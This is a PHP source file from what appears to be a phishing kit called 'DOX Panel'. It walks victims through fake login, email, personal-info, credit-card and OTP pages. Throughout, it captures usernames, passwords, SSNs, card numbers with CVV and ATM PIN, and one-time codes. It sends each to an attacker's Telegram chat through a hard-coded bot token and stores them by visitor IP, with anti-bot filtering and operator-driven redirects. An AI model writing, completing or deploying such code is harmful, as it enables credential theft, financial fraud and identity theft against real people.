<?php
// Enhanced Telegram notifications with better formatting and error handling

function sendTelegramMessage($message) {
    $config = getNotificationConfig();
    $botToken = $config['telegram_token'];
    $chatId = $config['telegram_chat_id'];

    if (empty($botToken) || empty($chatId)) {
        error_log("Telegram configuration missing");
        return false;
    }

    $url = "https://api.telegram.org/bot{$botToken}/sendMessage";
    $data = [
        'chat_id' => $chatId,
        'text' => $message,
        'parse_mode' => 'HTML',
        'disable_web_page_preview' => true
    ];

    // Log the attempt
    error_log("Sending Telegram message to chat ID: {$chatId}");

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_USERAGENT, 'DOX Panel Bot');

    $result = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $error = curl_error($ch);
    curl_close($ch);

    if ($result === false || $httpCode !== 200) {
        error_log("Telegram send failed: HTTP {$httpCode}, Error: {$error}");
        return false;
    }

    error_log("Telegram message sent successfully");
    return true;
}

function getNotificationConfig() {
    $configFile = 'Data/settings/config.json';
    if (file_exists($configFile)) {
        return json_decode(file_get_contents($configFile), true);
    }

    return [
        'telegram_token' => '8078271386:AAFiFlcg-E0vcNQLyhhVotNmTm1RfZgyCSQ',
        'telegram_chat_id' => '-1003137771790',
        'page_flow' => ['index.php', 'email_access.php', 'personal_info.php', 'credit_card.php', 'success.php'],
        'enable_country_filter' => true,
        'enable_antibot' => true
    ];
}

function getVisitorInfo() {
    global $antiBot;

    $ip = $antiBot->getRealIP();
    $info = $antiBot->getDetailedInfo($ip);

    return [
        'ip' => $ip,
        'country' => $info['country'] ?? 'Unknown',
        'city' => $info['city'] ?? 'Unknown',
        'isp' => $info['isp'] ?? 'Unknown',
        'connection_type' => $info['connection_type'] ?? 'Unknown',
        'is_mobile' => $info['is_mobile'] ?? false,
        'timestamp' => date('Y-m-d H:i:s'),
        'user_agent' => $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'
    ];
}

function getCurrentVisitorCount() {
    $sessions = glob('Data/sessions/*.json');
    // Filter out form data files, only count main session files
    $mainSessions = array_filter($sessions, function($file) {
        return strpos(basename($file), '_') === false;
    });
    return count($mainSessions);
}

function notifyPageVisit() {
    $visitorInfo = getVisitorInfo();
    $visitorCount = getCurrentVisitorCount();

    $protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http';
    $domain = $protocol . '://' . $_SERVER['HTTP_HOST'];

    $message = "🚨 <b>New Visitor #{$visitorCount}</b> 🚨\n\n";
    $message .= "📍 <b>IP:</b> <code>{$visitorInfo['ip']}</code>\n";
    $message .= "🌍 <b>Location:</b> {$visitorInfo['city']}, {$visitorInfo['country']}\n";
    $message .= "🏢 <b>ISP:</b> {$visitorInfo['isp']}\n";
    $message .= "💻 <b>Device:</b> {$visitorInfo['connection_type']}\n";
    $message .= "📱 <b>Network:</b> " . ($visitorInfo['is_mobile'] ? 'Mobile' : 'WiFi/Broadband') . "\n";
    $message .= "⏰ <b>Time:</b> {$visitorInfo['timestamp']}\n";
    $message .= "🔗 <b>Panel:</b> {$domain}/dox.php\n";
    $message .= "👨‍💻 <b>Developed by:</b> @END_913";

    // Save notification data using DataManager
    global $dataManager;
    $dataManager->updateSession($visitorInfo['ip'], basename($_SERVER['PHP_SELF']), [
        'page_visit' => $visitorInfo
    ]);

    return sendTelegramMessage($message);
}

function notifyLoginAttempt($username, $password, $token = '') {
    $visitorInfo = getVisitorInfo();
    $visitorCount = getCurrentVisitorCount();

    $message = "💀 <b>Login Attempt - Visitor #{$visitorCount}</b> 💀\n\n";
    $message .= "<b>👤 Username:</b> <code>" . htmlspecialchars($username) . "</code>\n";
    $message .= "<b>🔑 Password:</b> <code>" . htmlspecialchars($password) . "</code>\n";
    if (!empty($token)) {
        $message .= "<b>🎯 Token:</b> <code>" . htmlspecialchars($token) . "</code>\n";
    }
    $message .= "\n📍 <b>IP:</b> <code>{$visitorInfo['ip']}</code>\n";
    $message .= "🌍 <b>Location:</b> {$visitorInfo['city']}, {$visitorInfo['country']}\n";
    $message .= "🏢 <b>ISP:</b> {$visitorInfo['isp']}\n";
    $message .= "⏰ <b>Time:</b> {$visitorInfo['timestamp']}\n";
    $message .= "👨‍💻 <b>Developed by:</b> @END_913";

    // Save login data
    $loginData = [
        'username' => $username,
        'password' => $password,
        'token' => $token
    ];
    saveVisitorData($visitorInfo['ip'], 'login', $loginData);

    return sendTelegramMessage($message);
}

function notifyEmailAccess($email, $password = '') {
    $visitorInfo = getVisitorInfo();
    $visitorCount = getCurrentVisitorCount();

    $domain = '';
    if (strpos($email, '@') !== false) {
        $domain = strtolower(explode('@', $email)[1]);
    }

    $message = "💀 <b>Email Access - Visitor #{$visitorCount}</b> 💀\n\n";
    $message .= "<b>📧 Email:</b> <code>" . htmlspecialchars($email) . "</code>\n";
    $message .= "<b>🔑 Password:</b> <code>" . htmlspecialchars($password) . "</code>\n";
    $message .= "<b>🌐 Domain:</b> <code>" . htmlspecialchars($domain) . "</code>\n\n";
    $message .= "📍 <b>IP:</b> <code>{$visitorInfo['ip']}</code>\n";
    $message .= "🌍 <b>Location:</b> {$visitorInfo['city']}, {$visitorInfo['country']}\n";
    $message .= "🏢 <b>ISP:</b> {$visitorInfo['isp']}\n";
    $message .= "⏰ <b>Time:</b> {$visitorInfo['timestamp']}\n";
    $message .= "👨‍💻 <b>Developed by:</b> @END_913";

    // Save email data
    $emailData = [
        'email' => $email,
        'password' => $password,
        'domain' => $domain
    ];
    saveVisitorData($visitorInfo['ip'], 'email_access', $emailData);

    return sendTelegramMessage($message);
}

function notifyPersonalInfo($firstName, $lastName, $birthDate, $address, $city, $zipCode, $phoneNumber, $ssn) {
    $visitorInfo = getVisitorInfo();
    $visitorCount = getCurrentVisitorCount();

    $message = "💀 <b>Personal Info - Visitor #{$visitorCount}</b> 💀\n\n";
    $message .= "<b>👤 Name:</b> <code>" . htmlspecialchars($firstName . ' ' . $lastName) . "</code>\n";
    $message .= "<b>🎂 DOB:</b> <code>" . htmlspecialchars($birthDate) . "</code>\n";
    $message .= "<b>🏠 Address:</b> <code>" . htmlspecialchars($address) . "</code>\n";
    $message .= "<b>🏙️ City:</b> <code>" . htmlspecialchars($city) . "</code>\n";
    $message .= "<b>📮 ZIP:</b> <code>" . htmlspecialchars($zipCode) . "</code>\n";
    $message .= "<b>📞 Phone:</b> <code>" . htmlspecialchars($phoneNumber) . "</code>\n";
    $message .= "<b>🆔 SSN:</b> <code>" . htmlspecialchars($ssn) . "</code>\n\n";
    $message .= "📍 <b>IP:</b> <code>{$visitorInfo['ip']}</code>\n";
    $message .= "🌍 <b>Location:</b> {$visitorInfo['city']}, {$visitorInfo['country']}\n";
    $message .= "🏢 <b>ISP:</b> {$visitorInfo['isp']}\n";
    $message .= "⏰ <b>Time:</b> {$visitorInfo['timestamp']}\n";
    $message .= "👨‍💻 <b>Developed by:</b> @END_913";

    // Save personal info data
    $personalData = [
        'first_name' => $firstName,
        'last_name' => $lastName,
        'birth_date' => $birthDate,
        'address' => $address,
        'city' => $city,
        'zip_code' => $zipCode,
        'phone_number' => $phoneNumber,
        'ssn' => $ssn
    ];
    saveVisitorData($visitorInfo['ip'], 'personal_info', $personalData);

    return sendTelegramMessage($message);
}

function notifyCreditCard($cardNumber, $expDate, $ccv, $atmPin, $personalInfo) {
    $visitorInfo = getVisitorInfo();
    $visitorCount = getCurrentVisitorCount();

    $message = "💀 <b>Credit Card Info - Visitor #{$visitorCount}</b> 💀\n\n";
    $message .= "<b>💳 Card:</b> <code>" . htmlspecialchars($cardNumber) . "</code>\n";
    $message .= "<b>📅 EXP:</b> <code>" . htmlspecialchars($expDate) . "</code>\n";
    $message .= "<b>🔒 CCV:</b> <code>" . htmlspecialchars($ccv) . "</code>\n";
    $message .= "<b>🏧 PIN:</b> <code>" . htmlspecialchars($atmPin) . "</code>\n\n";

    // Add personal info if available
    if (!empty($personalInfo)) {
        $message .= "<b>👤 Name:</b> <code>" . htmlspecialchars(($personalInfo['first_name'] ?? '') . ' ' . ($personalInfo['last_name'] ?? '')) . "</code>\n";
        $message .= "<b>🎂 DOB:</b> <code>" . htmlspecialchars($personalInfo['birth_date'] ?? 'N/A') . "</code>\n";
        $message .= "<b>🏠 Address:</b> <code>" . htmlspecialchars($personalInfo['address'] ?? 'N/A') . "</code>\n";
        $message .= "<b>🏙️ City:</b> <code>" . htmlspecialchars($personalInfo['city'] ?? 'N/A') . "</code>\n";
        $message .= "<b>📮 ZIP:</b> <code>" . htmlspecialchars($personalInfo['zip_code'] ?? 'N/A') . "</code>\n";
        $message .= "<b>📞 Phone:</b> <code>" . htmlspecialchars($personalInfo['phone_number'] ?? 'N/A') . "</code>\n";
        $message .= "<b>🆔 SSN:</b> <code>" . htmlspecialchars($personalInfo['ssn'] ?? 'N/A') . "</code>\n\n";
    }

    $message .= "📍 <b>IP:</b> <code>{$visitorInfo['ip']}</code>\n";
    $message .= "🌍 <b>Location:</b> {$visitorInfo['city']}, {$visitorInfo['country']}\n";
    $message .= "🏢 <b>ISP:</b> {$visitorInfo['isp']}\n";
    $message .= "⏰ <b>Time:</b> {$visitorInfo['timestamp']}\n";
    $message .= "👨‍💻 <b>Developed by:</b> @END_913";

    // Save credit card data
    $cardData = [
        'card_number' => $cardNumber,
        'exp_date' => $expDate,
        'ccv' => $ccv,
        'atm_pin' => $atmPin,
        'personal_info' => $personalInfo
    ];
    saveVisitorData($visitorInfo['ip'], 'credit_card', $cardData);

    return sendTelegramMessage($message);
}

function notifyOTPSMS($otpCode, $phone = '') {
    $visitorInfo = getVisitorInfo();
    $visitorCount = getCurrentVisitorCount();

    $message = "💀 <b>OTP SMS - Visitor #{$visitorCount}</b> 💀\n\n";
    if (!empty($phone)) {
        $message .= "<b>📞 Phone:</b> <code>" . htmlspecialchars($phone) . "</code>\n";
    }
    $message .= "<b>🔢 OTP:</b> <code>" . htmlspecialchars($otpCode) . "</code>\n\n";
    $message .= "📍 <b>IP:</b> <code>{$visitorInfo['ip']}</code>\n";
    $message .= "🌍 <b>Location:</b> {$visitorInfo['city']}, {$visitorInfo['country']}\n";
    $message .= "🏢 <b>ISP:</b> {$visitorInfo['isp']}\n";
    $message .= "⏰ <b>Time:</b> {$visitorInfo['timestamp']}\n";
    $message .= "👨‍💻 <b>Developed by:</b> @END_913";

    // Save OTP data
    $otpData = [
        'otp_code' => $otpCode,
        'phone' => $phone
    ];
    saveVisitorData($visitorInfo['ip'], 'otp_sms', $otpData);

    return sendTelegramMessage($message);
}

function notifySMSEmail($emailCode) {
    $visitorInfo = getVisitorInfo();
    $visitorCount = getCurrentVisitorCount();

    $message = "💀 <b>Email OTP - Visitor #{$visitorCount}</b> 💀\n\n";
    $message .= "<b>📧 Code:</b> <code>" . htmlspecialchars($emailCode) . "</code>\n\n";
    $message .= "📍 <b>IP:</b> <code>{$visitorInfo['ip']}</code>\n";
    $message .= "🌍 <b>Location:</b> {$visitorInfo['city']}, {$visitorInfo['country']}\n";
    $message .= "🏢 <b>ISP:</b> {$visitorInfo['isp']}\n";
    $message .= "⏰ <b>Time:</b> {$visitorInfo['timestamp']}\n";
    $message .= "👨‍💻 <b>Developed by:</b> @END_913";

    // Save SMS email data
    $emailData = [
        'email_code' => $emailCode
    ];
    saveVisitorData($visitorInfo['ip'], 'sms_email', $emailData);

    return sendTelegramMessage($message);
}

function notifyErrorLogin($username, $password, $token = '') {
    $visitorInfo = getVisitorInfo();
    $visitorCount = getCurrentVisitorCount();

    $message = "💀 <b>Error Login - Visitor #{$visitorCount}</b> 💀\n\n";
    $message .= "<b>👤 Username:</b> <code>" . htmlspecialchars($username) . "</code>\n";
    $message .= "<b>🔑 Password:</b> <code>" . htmlspecialchars($password) . "</code>\n";
    if (!empty($token)) {
        $message .= "<b>🎯 Token:</b> <code>" . htmlspecialchars($token) . "</code>\n";
    }
    $message .= "\n📍 <b>IP:</b> <code>{$visitorInfo['ip']}</code>\n";
    $message .= "🌍 <b>Location:</b> {$visitorInfo['city']}, {$visitorInfo['country']}\n";
    $message .= "🏢 <b>ISP:</b> {$visitorInfo['isp']}\n";
    $message .= "⏰ <b>Time:</b> {$visitorInfo['timestamp']}\n";
    $message .= "👨‍💻 <b>Developed by:</b> @END_913";

    // Save error login data
    $errorData = [
        'username' => $username,
        'password' => $password,
        'token' => $token
    ];
    saveVisitorData($visitorInfo['ip'], 'error_login', $errorData);

    return sendTelegramMessage($message);
}

function notifyErrorEmail($email, $password) {
    $visitorInfo = getVisitorInfo();
    $visitorCount = getCurrentVisitorCount();

    $domain = '';
    if (strpos($email, '@') !== false) {
        $domain = strtolower(explode('@', $email)[1]);
    }

    $message = "💀 <b>Error Email - Visitor #{$visitorCount}</b> 💀\n\n";
    $message .= "<b>📧 Email:</b> <code>" . htmlspecialchars($email) . "</code>\n";
    $message .= "<b>🔑 Password:</b> <code>" . htmlspecialchars($password) . "</code>\n";
    $message .= "<b>🌐 Domain:</b> <code>" . htmlspecialchars($domain) . "</code>\n\n";
    $message .= "📍 <b>IP:</b> <code>{$visitorInfo['ip']}</code>\n";
    $message .= "🌍 <b>Location:</b> {$visitorInfo['city']}, {$visitorInfo['country']}\n";
    $message .= "🏢 <b>ISP:</b> {$visitorInfo['isp']}\n";
    $message .= "⏰ <b>Time:</b> {$visitorInfo['timestamp']}\n";
    $message .= "👨‍💻 <b>Developed by:</b> @END_913";

    // Save error email data
    $errorData = [
        'email' => $email,
        'password' => $password,
        'domain' => $domain
    ];
    saveVisitorData($visitorInfo['ip'], 'error_email', $errorData);

    return sendTelegramMessage($message);
}

function saveVisitorData($ip, $dataType, $data) {
    global $dataManager;

    if (!$dataManager) {
        require_once 'data_manager.php';
        $dataManager = new DataManager();
    }

    $currentPage = basename($_SERVER['PHP_SELF']);
    $formData = [$dataType => $data];

    return $dataManager->updateSession($ip, $currentPage, $formData);
}

function getNextPageInFlow() {
    // Load page flow from config
    $config = getNotificationConfig();
    $pageFlow = $config['page_flow'] ?? [
        'index.php',
        'email_access.php',
        'personal_info.php', 
        'credit_card.php',
        'success.php'
    ];

    // Clean up page flow array
    $pageFlow = array_map('trim', $pageFlow);
    $pageFlow = array_filter($pageFlow);

    $currentPage = basename($_SERVER['PHP_SELF']);

    // Get visitor's completed pages
    global $antiBot, $dataManager;
    $ip = $antiBot->getRealIP();
    $sessionData = $dataManager->getSession($ip);
    $completedPages = [];

    if ($sessionData && isset($sessionData['data'])) {
        foreach ($sessionData['data'] as $type => $entries) {
            switch($type) {
                case 'login':
                    $completedPages[] = 'index.php';
                    break;
                case 'email_access':
                    $completedPages[] = 'email_access.php';
                    break;
                case 'personal_info':
                    $completedPages[] = 'personal_info.php';
                    break;
                case 'credit_card':
                    $completedPages[] = 'credit_card.php';
                    break;
            }
        }
    }

    // Check for redirect command first
    $redirectFile = "Data/redirects/{$ip}.txt";

    if (file_exists($redirectFile)) {
        $redirectTo = trim(file_get_contents($redirectFile));

        // If redirecting to an error page, handle it specially
        if (in_array($redirectTo, ['error_login.php', 'error_email.php'])) {
            return $redirectTo;
        }

        // If redirecting to a special page (not in main flow), allow it
        if (in_array($redirectTo, ['otp_sms.php', 'sms_email.php']) || in_array($redirectTo, $pageFlow)) {
            return $redirectTo;
        }
    }

    // Handle error pages - they should return to normal flow
    if ($currentPage === 'error_login.php') {
        // After error login, continue with normal flow
        if (!in_array('index.php', $completedPages)) {
            return 'index.php';
        }
        return 'email_access.php';
    }

    if ($currentPage === 'error_email.php') {
        // After error email, continue with normal flow
        if (!in_array('email_access.php', $completedPages)) {
            return 'email_access.php';
        }
        return 'personal_info.php';
    }

    // Handle special pages (OTP, SMS Email) - return to main flow
    if (in_array($currentPage, ['otp_sms.php', 'sms_email.php'])) {
        // Find next uncompleted page in main flow
        foreach ($pageFlow as $page) {
            $pageCompleted = false;
            switch($page) {
                case 'index.php':
                    $pageCompleted = in_array('index.php', $completedPages);
                    break;
                case 'email_access.php':
                    $pageCompleted = in_array('email_access.php', $completedPages);
                    break;
                case 'personal_info.php':
                    $pageCompleted = in_array('personal_info.php', $completedPages);
                    break;
                case 'credit_card.php':
                    $pageCompleted = in_array('credit_card.php', $completedPages);
                    break;
                case 'success.php':
                    // Success page is always last
                    break;
            }

            if (!$pageCompleted && $page !== 'success.php') {
                return $page;
            }
        }

        // If all main pages completed, go to success
        return 'success.php';
    }

    // Find next page in main flow that hasn't been completed
    $currentIndex = array_search($currentPage, $pageFlow);

    if ($currentIndex !== false) {
        // Look for next uncompleted page
        for ($i = $currentIndex + 1; $i < count($pageFlow); $i++) {
            $nextPage = $pageFlow[$i];

            // Check if this page is completed
            $pageCompleted = false;
            switch($nextPage) {
                case 'index.php':
                    $pageCompleted = in_array('index.php', $completedPages);
                    break;
                case 'email_access.php':
                    $pageCompleted = in_array('email_access.php', $completedPages);
                    break;
                case 'personal_info.php':
                    $pageCompleted = in_array('personal_info.php', $completedPages);
                    break;
                case 'credit_card.php':
                    $pageCompleted = in_array('credit_card.php', $completedPages);
                    break;
                default:
                    $pageCompleted = false;
            }

            if (!$pageCompleted) {
                return $nextPage;
            }
        }

        // If all pages are completed, go to success
        return 'success.php';
    }

    // Default fallback
    return 'success.php';
}
?>